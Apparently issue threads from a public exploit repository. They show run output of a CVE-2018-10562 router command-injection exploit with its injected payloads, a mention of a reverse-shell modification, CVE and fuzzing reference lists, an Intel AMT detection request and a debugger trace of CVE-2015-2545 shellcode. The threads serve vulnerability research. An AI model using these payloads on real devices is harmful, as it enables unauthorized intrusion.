573 root 6360 S /bin/tr069Mgr -p 20 -s 0
574 root 6360 S < /bin/tr069Mgr -p 20 -s 0
575 root 6360 S < /bin/tr069Mgr -p 20 -s 0
576 root 6360 S < /bin/tr069Mgr -p 20 -s 0
577 root 2332 S /bin/WebMgr -p 20 -s 0
580 root 6336 S /bin/MecMgr -p 20 -s 0
607 root 3624 D /bin/PonMgr -p 20 -s 0
608 root 3624 S /bin/PonMgr -p 20 -s 0
609 root 3624 D < /bin/PonMgr -p 20 -s 0
684 root 2308 S /bin/NetMgr -p 20 -s 0
685 root 2308 S /bin/NetMgr -p 20 -s 0
692 root 3604 S < /bin/VmrMgr -p 10 -s 0
695 root SW< [voip isr/0]
698 root 3604 S < /bin/VmrMgr -p 10 -s 0
701 root SW< [TAPIevents/0]
709 root SW [TAPIdxt_int]
711 root 3604 S < /bin/VmrMgr -p 10 -s 0
720 root 6336 S /bin/MecMgr -p 20 -s 0
722 root SW< [brdg_wkq/0]
996 root 1140 S /bin/sh /sbin/pppoe-connect 0
1005 root 1412 S /sbin/pppd pty /sbin/pppoe -p /var/run/pppoe0.pid.ppp
1006 root 1132 S sh -c /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan
1007 nobody 600 S /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan0 -T 8
1032 nobody 812 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1033 root 800 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1216 root 1320 S upnpd ppp0 br0
1217 root 1320 S upnpd ppp0 br0
1218 root 1320 S upnpd ppp0 br0
1220 root 1320 S upnpd ppp0 br0
1221 root 1320 S upnpd ppp0 br0
1222 root 1320 S upnpd ppp0 br0
1224 root 1320 S upnpd ppp0 br0
1226 root 1320 S upnpd ppp0 br0
1228 root 1320 S upnpd ppp0 br0
1229 root 1320 S upnpd ppp0 br0
1315 root 1240 S hostapd -B /tmp/hostapd.conf
6834 root 2332 S /bin/WebMgr -p 20 -s 0
8360 root 2332 S /bin/WebMgr -p 20 -s 0
8363 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8364 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8365 root 1136 R ps
TFGQ;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/"
INFO:__main__:sending payload: 127.0.0.1;`echo Rbfg;ls /web/;echo Rbfg`;
diag_result = "ping -c 4 -s 64 127.0.0.1;Rbfg
html
Rbfg;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/html/"
INFO:__main__:sending payload: 127.0.0.1;`echo dZad;ls /web/html/;echo dZad`;
diag_result = "ping -c 4 -s 64 127.0.0.1;dZad
backup.html
ddns.html
devinfo.html
diag.html
dmz_alg.html
dns_host.html
download
error.html
firewall.html
images
index.html
init.html
ip_filter.html
lan.html
landev.html
language.html
laninfo.html
log.html
login.html
login_spa.html
logo.html
logout.html
mac_filter.html
menu.html
nat.html
nat_portforwarding.html
ntp.html
password.html
poninfo.html
reboot.html
rebooting.html
route.html
script
slid.html
style
tab.html
template
tr069.html
upgrade.html
upnp.html
usb.html
wan.html
waninfo.html
wifi.html
dZad;
";
New ajust on xpl
Hi there.. i make this modification on the exploit to make reverse shell connection.. thanks for sharing the vulnerable environment.. =))
here is the link of xpl: https://github.com/anarcoder/CVE_2017_5638
best regards,
daniel.
here screenshot:
[Question] Fuzzing
AFL
- https://en.wikipedia.org/wiki/Fuzzing
- https://en.wikipedia.org/wiki/Fuzz_testing
- http://lcamtuf.coredump.cx/afl/
- http://lcamtuf.coredump.cx/afl/demo/
- http://lcamtuf.coredump.cx/afl/QuickStartGuide.txt
- http://lcamtuf.coredump.cx/afl/#bugs
- http://lcamtuf.coredump.cx/afl/README.txt
- http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
- http://lcamtuf.coredump.cx/afl/technical_details.txt
- http://lcamtuf.blogspot.com/2014/08/binary-fuzzing-strategies-what-works.html
- http://lcamtuf.blogspot.com/2014/10/fuzzing-binaries-without-execve.html
- http://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html
- http://lcamtuf.blogspot.com/2014/11/afl-fuzz-crash-exploration-mode.html
- http://lcamtuf.blogspot.com/2015/01/afl-fuzz-making-up-grammar-with.html
- http://lcamtuf.blogspot.com/2015/04/finding-bugs-in-sqlite-easy-way.html
- http://lcamtuf.blogspot.com/2016/02/say-hello-to-afl-analyze.html
- https://groups.google.com/d/msg/afl-users/eWb2PgjLnUo/8AKqadYzSBoJ
- https://groups.google.com/forum/#!topic/afl-users/RW4RF6x9aBc
- https://github.com/secfigo/Awesome-Fuzzing
- http://llvm.org/docs/LibFuzzer.html
- http://honggfuzz.com/
- https://github.com/aoh/radamsa
- https://www.youtube.com/watch?v=29RbO5bftwo
- https://www.evilsocket.net/2015/04/30/fuzzing-with-afl-fuzz-a-practical-example-afl-vs-binutils/
- https://labsblog.f-secure.com/2017/06/22/super-awesome-fuzzing-part-one/
- http://thecyberrecce.net/2017/03/20/software-exploit-development-fuzzing-with-afl/
- https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/project-triforce-run-afl-on-everything/
- https://www.fastly.com/blog/how-fuzz-server-american-fuzzy-lop
- https://www.reddit.com/r/fuzzing/
- https://animal0day.blogspot.jp/2017/05/fuzzing-apache-httpd-server-with.html
- https://animal0day.blogspot.jp/2017/07/
- https://sensepost.com/blog/2017/fuzzing-apache-httpd-server-with-american-fuzzy-lop-%2B-persistent-mode/
- https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/
- http://research.aurainfosec.io/hunting-for-bugs-101/
- http://paper.seebug.org/323/
$ CC="afl-clang-fast" CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb" ./configure
$ make
[Add] CVE-2017-8464
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
- http://paper.seebug.org/357/
- https://msdn.microsoft.com/en-us/library/dd891253.aspx
- http://www.tuicool.com/articles/QNfUjyr
- http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
- http://www.tuicool.com/articles/QNfUjyr
- https://github.com/rapid7/metasploit-framework/pull/8767/files
[Links] MS17-010
References
- https://zerosum0x0.blogspot.jp/2017/04/doublepulsar-initial-smb-backdoor-ring.html
- https://zerosum0x0.blogspot.jp/2017/06/eternalblue-exploit-analysis-and-port.html
- https://risksense.com/_api/filesystem/468/EternalBlue_RiskSense-Exploit-Analysis-and-Port-to-Microsoft-Windows-10_v1_2.pdf
- https://www.exploit-db.com/docs/42329.pdf
- https://github.com/worawit/MS17-010
- https://www.exploit-db.com/exploits/42315/
- https://github.com/omri9741/cve-2017-7494/
- https://github.com/CoreSecurity/impacket
- https://github.com/CoreSecurity/impacket/blob/master/impacket/dcerpc/v5/epm.py
- https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb
- https://msdn.microsoft.com/en-us//library/cc738291(v=ws.10).aspx
- http://www.ampliasecurity.com/research/NTLMWeakNonce-bh2010-usa-ampliasecurity.pdf
- https://www.coresecurity.com/corelabs-research/publications/new-smb-and-dcerpc-features-impacket-v0960
- http://www.rubydoc.info/github/rapid7/metasploit-framework/Msf/Exploit/Remote/DCERPC
- https://en.wikipedia.org/wiki/DCE/RPC
- https://technet.microsoft.com/en-us/library/cc759499.aspx
How can I recurrent this vulnerable?
I notice there is a http link hyoeyeep.ws,and I modified hosts file to let this domain point to local server.On the server,I put the template.doc and change its content-type to application/hta.I opened the bin file as doc or rtf,but nothing happened.Which step that I missed?
Potential false negative with the CVE-2017-5689.py script
You may get false negative with current script:
- AMT web interface could be disable while only WS-MAN is enabled
- In Kabilake and Skylake system with AMT 11.x version, the Server field in the HTTP response won't match what you have in your script.
See example below to send WS-MAN to get AMT FW Core Version and also how the HTTP response with Server field will look like
POST /wsman HTTP/1.1
Content-Length: 1543
Connection: close
User-Agent: Mozilla/5.0
Host: 134.134.134.134
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tns="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity" xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:wscat="http://schemas.xmlsoap.org/ws/2005/06/wsmancat" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:wse="http://schemas.xmlsoap.org/ws/2004/08/eventing" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:wsen="http://schemas.xmlsoap.org/ws/2004/09/enumeration">
<soap:Header>
<wsa:To>http://134.134.134.134:16992/wsman</wsa:To>
<wsa:ReplyTo>
<wsa:Address soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:Address>
</wsa:ReplyTo>
<wsa:Action soap:mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/09/transfer/Get</wsa:Action>
<wsman:MaxEnvelopeSize soap:mustUnderstand="true">51200</wsman:MaxEnvelopeSize>
<wsa:MessageID>uuid:72426165-3612-0436-6450-103681140543</wsa:MessageID>
<wsman:ResourceURI soap:mustUnderstand="true">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_SoftwareIdentity</wsman:ResourceURI>
<wsman:SelectorSet>
<wsman:Selector Name="InstanceID">AMT FW Core Version</wsman:Selector>
</wsman:SelectorSet>
<wsman:OperationTimeout>PT60.000S</wsman:OperationTimeout>
</soap:Header>
<soap:Body />
</soap:Envelope>
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:30D40000000000000000000000000000", nonce="zm8DAAsfAAAKg62FIMR9haAOe9Ix13A6",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 690
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html><head><link rel=stylesheet href=/styles.css>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Intel® Active Management Technology</title></head>
<body>
<table class=header>
<tr><td valign=top nowrap>
<p class=top1>Intel<font class=r><sup>®</sup></font> Active Management Technology
<td valign="top"><img src="logo.gif" align="right" alt="Intel">
</table>
<br />
<h2 class=warn>Log on failed. Incorrect user name or password, or user account temporarily locked.</h2>
<p>
<form METHOD="GET" action="index.htm"><h2><input type=submit value="Try again">
</h2></form>
<p>
</body>
</html>
[Analysis] CVE-2015-2545
*** wait with pending attach
************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*C:\Symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 2fe80000 2fee6000 C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
ModLoad: 77570000 776ac000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 77350000 77424000 C:\Windows\system32\kernel32.dll
ModLoad: 75880000 758ca000 C:\Windows\system32\KERNELBASE.dll
ModLoad: 76390000 76430000 C:\Windows\system32\ADVAPI32.dll
ModLoad: 760d0000 7617c000 C:\Windows\system32\msvcrt.dll
ModLoad: 76450000 76469000 C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76180000 76221000 C:\Windows\system32\RPCRT4.dll
ModLoad: 6c660000 6c6fb000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll
ModLoad: 755b0000 755fc000 C:\Windows\system32\apphelp.dll
ModLoad: 6d390000 6d40b000 C:\Windows\AppPatch\AcSpecfc.DLL
ModLoad: 75590000 755ab000 C:\Windows\system32\SspiCli.dll
ModLoad: 6f1e0000 6f264000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\COMCTL32.dll
ModLoad: 76240000 7628e000 C:\Windows\system32\GDI32.dll
ModLoad: 76290000 76359000 C:\Windows\system32\USER32.dll
ModLoad: 75b60000 75b6a000 C:\Windows\system32\LPK.dll
ModLoad: 75f60000 75ffd000 C:\Windows\system32\USP10.dll
ModLoad: 70260000 702d9000 C:\Windows\system32\mscms.dll
ModLoad: 74d40000 74d57000 C:\Windows\system32\USERENV.dll
ModLoad: 75680000 7568b000 C:\Windows\system32\profapi.dll
ModLoad: 776c0000 77717000 C:\Windows\system32\SHLWAPI.dll
ModLoad: 75cf0000 75e4c000 C:\Windows\system32\ole32.dll
ModLoad: 76700000 7734a000 C:\Windows\system32\SHELL32.dll
ModLoad: 739c0000 739f2000 C:\Windows\system32\WINMM.dll
ModLoad: 6c820000 6c907000 C:\Windows\system32\DDRAW.dll
ModLoad: 744d0000 744d6000 C:\Windows\system32\DCIMAN32.dll
ModLoad: 759c0000 75b5d000 C:\Windows\system32\SETUPAPI.dll
ModLoad: 75900000 75927000 C:\Windows\system32\CFGMGR32.dll
ModLoad: 76000000 7608f000 C:\Windows\system32\OLEAUT32.dll
ModLoad: 75860000 75872000 C:\Windows\system32\DEVOBJ.dll
ModLoad: 73f50000 73f63000 C:\Windows\system32\dwmapi.dll
ModLoad: 710d0000 710e2000 C:\Windows\system32\MPR.dll
ModLoad: 77720000 7779b000 C:\Windows\system32\COMDLG32.dll
ModLoad: 76430000 7644f000 C:\Windows\system32\IMM32.dll
ModLoad: 75b70000 75c3c000 C:\Windows\system32\MSCTF.dll
ModLoad: 76090000 760c5000 C:\Windows\system32\WS2_32.dll
ModLoad: 76230000 76236000 C:\Windows\system32\NSI.dll
ModLoad: 6ded0000 6e110000 C:\Windows\system32\msi.dll
ModLoad: 64020000 65168000 C:\Program Files\Microsoft Office\Office12\wwlib.dll
ModLoad: 66e80000 67de8000 C:\Program Files\Microsoft Office\Office12\oart.dll
ModLoad: 685a0000 69627000 C:\Program Files\Common Files\Microsoft Shared\office12\mso.dll
ModLoad: 6c920000 6c9f7000 C:\Program Files\Microsoft Office\Office12\1033\wwintl.dll
ModLoad: 74330000 74370000 C:\Windows\system32\uxtheme.dll
ModLoad: 744e0000 7467e000 C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\Comctl32.dll
ModLoad: 62f90000 635e5000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSORES.DLL
ModLoad: 6c560000 6c61a000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSPTLS.DLL
ModLoad: 6fc30000 6fc47000 C:\Windows\system32\DavClnt.DLL
ModLoad: 6fae0000 6fae8000 C:\Windows\system32\DAVHLPR.dll
ModLoad: 5e420000 5edfd000 C:\Program Files\Common Files\Microsoft Shared\office12\1033\MSOINTL.DLL
ModLoad: 6d2e0000 6d32a000 C:\Windows\system32\mscoree.dll
ModLoad: 6ca00000 6ca7d000 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
ModLoad: 74a50000 74a59000 C:\Windows\system32\VERSION.dll
ModLoad: 75600000 7560c000 C:\Windows\system32\CRYPTBASE.dll
ModLoad: 6fff0000 70041000 C:\Windows\system32\Winspool.DRV
ModLoad: 6cb20000 6cbda000 C:\Windows\system32\spool\DRIVERS\W32X86\3\unidrvui.dll
ModLoad: 6c520000 6c558000 C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdui.DLL
ModLoad: 76670000 766f3000 C:\Windows\system32\CLBCatQ.DLL
ModLoad: 683c0000 684c5000 C:\Program Files\Common Files\Microsoft Shared\office12\riched20.dll
ModLoad: 743a0000 74495000 C:\Windows\system32\propsys.dll
ModLoad: 73d00000 73d21000 C:\Windows\system32\ntmarta.dll
ModLoad: 75ca0000 75ce5000 C:\Windows\system32\WLDAP32.dll
ModLoad: 6a1a0000 6a2f5000 C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll
ModLoad: 751d0000 751e7000 C:\Windows\system32\CRYPTSP.dll
ModLoad: 74eb0000 74eeb000 C:\Windows\system32\rsaenh.dll
ModLoad: 75670000 7567e000 C:\Windows\system32\RpcRtRemote.dll
ModLoad: 75610000 7566f000 C:\Windows\system32\SXS.DLL
ModLoad: 6c460000 6c517000 C:\Program Files\Microsoft Office\Office12\msproof6.dll
ModLoad: 68050000 680d7000 C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCP80.dll
ModLoad: 3f100000 3f401000 C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL
ModLoad: 66db0000 66e71000 C:\Windows\system32\spool\DRIVERS\W32X86\3\mxdwdrv.dll
ModLoad: 6e7b0000 6e7c4000 C:\Windows\system32\FontSub.dll
(cd0.a04): Break instruction exception - code 80000003 (first chance)
eax=7ffd4000 ebx=00000000 ecx=00000000 edx=7760f125 esi=00000000 edi=00000000
eip=775a40f0 esp=04b4f78c ebp=04b4f7b8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
775a40f0 cc int 3
0:010> ba r4 ZwProtectVirtualMemory
0:010> g
(cd0.e50): Unknown exception - code e0000002 (first chance)
(cd0.e50): Unknown exception - code e0000002 (first chance)
ModLoad: 62e00000 62f8b000 C:\Program Files\Common Files\Microsoft Shared\OFFICE12\OGL.DLL
ModLoad: 73e00000 73e0d000 C:\Windows\system32\WTSAPI32.DLL
ModLoad: 75690000 756b9000 C:\Windows\system32\WINSTA.dll
ModLoad: 6fad0000 6fad9000 C:\Windows\system32\LINKINFO.dll
ModLoad: 6e8a0000 6e910000 C:\Windows\system32\ntshrui.dll
ModLoad: 75330000 75349000 C:\Windows\system32\srvcli.dll
ModLoad: 6e940000 6e94b000 C:\Windows\system32\cscapi.dll
ModLoad: 73900000 7390a000 C:\Windows\system32\slc.dll
ModLoad: 63bb0000 63c1f000 C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\EPSIMP32.FLT -
Breakpoint 0 hit
eax=000000b8 ebx=04371f01 ecx=775b5f18 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed2a0 esp=002bc7a0 ebp=002bc7dc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3e:
63bed2a0 8975d4 mov dword ptr [ebp-2Ch],esi ss:0023:002bc7b0=00000000
0:000> ub eip
EPSIMP32!RegisterPercentCallback+0x15c23:
63bed285 3b482c cmp ecx,dword ptr [eax+2Ch]
63bed288 7d21 jge EPSIMP32!RegisterPercentCallback+0x15c49 (63bed2ab)
63bed28a 8b5024 mov edx,dword ptr [eax+24h]
63bed28d 8b12 mov edx,dword ptr [edx]
63bed28f 8b5220 mov edx,dword ptr [edx+20h]
63bed292 035028 add edx,dword ptr [eax+28h]
63bed295 c745d003000000 mov dword ptr [ebp-30h],3
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx]
0:000> bc 0
0:000> bp 63bed29c "u edx+ecx;r;g;"
0:000> bp ntdll!NtCreateEvent+0x5 ".if(eax == 0x45){g;}"
0:000> g
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000 add byte ptr [eax],al
775b5f1d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc718 ebp=002bc754 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
775b5f34 c20800 ret 8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc6a4 ebp=002bc6e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1c=00
ntdll!ZwProtectVirtualMemory+0x1:
775b5f19 d7 xlat byte ptr [ebx]
775b5f1a 0000 add byte ptr [eax],al
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
eax=043720b0 ebx=04371f01 ecx=775b5f19 edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f19=d7
ntdll!ZwProtectVirtualMemory+0x2:
775b5f1a 0000 add byte ptr [eax],al
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1a edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1a=00
ntdll!ZwProtectVirtualMemory+0x3:
775b5f1b 0000 add byte ptr [eax],al
775b5f1d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
eax=043720b0 ebx=04371f01 ecx=775b5f1b edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1b=00
ntdll!ZwProtectVirtualMemory+0x4:
775b5f1c 00ba0003fe7f add byte ptr SharedUserData!SystemCallStub (7ffe0300)[edx],bh
775b5f22 ff12 call dword ptr [edx]
775b5f24 c21400 ret 14h
775b5f27 90 nop
ntdll!NtPulseEvent:
775b5f28 b8d8000000 mov eax,0D8h
775b5f2d ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
775b5f32 ff12 call dword ptr [edx]
775b5f34 c20800 ret 8
eax=043720b0 ebx=04371f01 ecx=775b5f1c edx=00000000 esi=00000000 edi=0011ea78
eip=63bed29c esp=002bc5f0 ebp=002bc62c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
EPSIMP32!RegisterPercentCallback+0x15c3a:
63bed29c 0fb6040a movzx eax,byte ptr [edx+ecx] ds:0023:775b5f1c=00
(cd0.e50): C++ EH exception - code e06d7363 (first chance)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=000000d7 ebx=04371fa0 ecx=061e0f08 edx=0011f5c8 esi=0011ea78 edi=00000000
eip=775b55ad esp=061e0f62 ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
ntdll!ZwCreateEvent+0x5:
775b55ad ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
0:000> dd esp
061e0f62 061e2f08 ffffffff 061e0108 061e010c
061e0f72 00000040 061e0110 00000000 00000000
061e0f82 00000000 00000000 00000000 00000000
061e0f92 00000000 00000000 00000000 00000000
061e0fa2 00000000 00000000 00000000 00000000
061e0fb2 00000000 00000000 00000000 00000000
061e0fc2 00000000 00000000 00000000 00000000
061e0fd2 00000000 00000000 00000000 00000000
0:000> g poi(esp)
WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding can be inaccurate.
eax=00000000 ebx=04371fa0 ecx=061e0f5e edx=775b70b4 esi=0011ea78 edi=00000000
eip=061e2f08 esp=061e0f7a ebp=002bc870 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
061e2f08 60 pushad
0:000> uf eip
Flow analysis was incomplete, some code may be missing
061e2f08 60 pushad
061e2f09 64a100000000 mov eax,dword ptr fs:[00000000h]
061e2f0f 8b4004 mov eax,dword ptr [eax+4]
061e2f12 250000ffff and eax,0FFFF0000h
061e2f17 6681384d5a cmp word ptr [eax],5A4Dh
061e2f1c 7517 jne 061e2f35 Branch
061e2f1e 81783c00020000 cmp dword ptr [eax+3Ch],200h
061e2f25 730e jae 061e2f35 Branch
061e2f27 8b503c mov edx,dword ptr [eax+3Ch]
061e2f2a 03d0 add edx,eax
061e2f2c 66813a5045 cmp word ptr [edx],4550h
061e2f31 7502 jne 061e2f35 Branch
061e2f33 eb07 jmp 061e2f3c Branch
061e2f35 2d00000100 sub eax,10000h
061e2f3a ebdb jmp 061e2f17 Branch
061e2f3c 8b7a1c mov edi,dword ptr [edx+1Ch]
061e2f3f 8b722c mov esi,dword ptr [edx+2Ch]
061e2f42 03f0 add esi,eax
061e2f44 03fe add edi,esi
061e2f46 83ed04 sub ebp,4
061e2f49 8b4d00 mov ecx,dword ptr [ebp]
061e2f4c 3bce cmp ecx,esi
061e2f4e 7218 jb 061e2f68 Branch
061e2f50 3bcf cmp ecx,edi
061e2f52 7314 jae 061e2f68 Branch
061e2f54 8079fdff cmp byte ptr [ecx-3],0FFh
061e2f58 750e jne 061e2f68 Branch
061e2f5a 8079fe50 cmp byte ptr [ecx-2],50h
061e2f5e 7508 jne 061e2f68 Branch
061e2f60 8079ff10 cmp byte ptr [ecx-1],10h
061e2f64 7502 jne 061e2f68 Branch
061e2f66 eb02 jmp 061e2f6a Branch
061e2f68 ebdc jmp 061e2f46 Branch
061e2f6a 896c2418 mov dword ptr [esp+18h],ebp
061e2f6e 61 popad
061e2f6f 87e1 xchg esp,ecx
061e2f71 60 pushad
061e2f72 8bec mov ebp,esp
061e2f74 e800000000 call 061e2f79
061e2f79 8b3424 mov esi,dword ptr [esp]
061e2f7c 8d642404 lea esp,[esp+4]
061e2f80 81ee71000000 sub esi,71h
061e2f86 81c6a0000000 add esi,0A0h
061e2f8c 68dc000000 push 0DCh
061e2f91 59 pop ecx
061e2f92 8d3c8e lea edi,[esi+ecx*4]
061e2f95 6a1f push 1Fh
061e2f97 58 pop eax
061e2f98 d12f shr dword ptr [edi],1
061e2f9a d116 rcl dword ptr [esi],1
061e2f9c 83c604 add esi,4
061e2f9f 48 dec eax
061e2fa0 7506 jne 061e2fa8 Branch
061e2fa2 6a1f push 1Fh
061e2fa4 58 pop eax
061e2fa5 83c704 add edi,4
061e2fa8 7177 jno 061e3021 Branch
061e2faa b245 mov dl,45h
061e2fac 2c98 sub al,98h
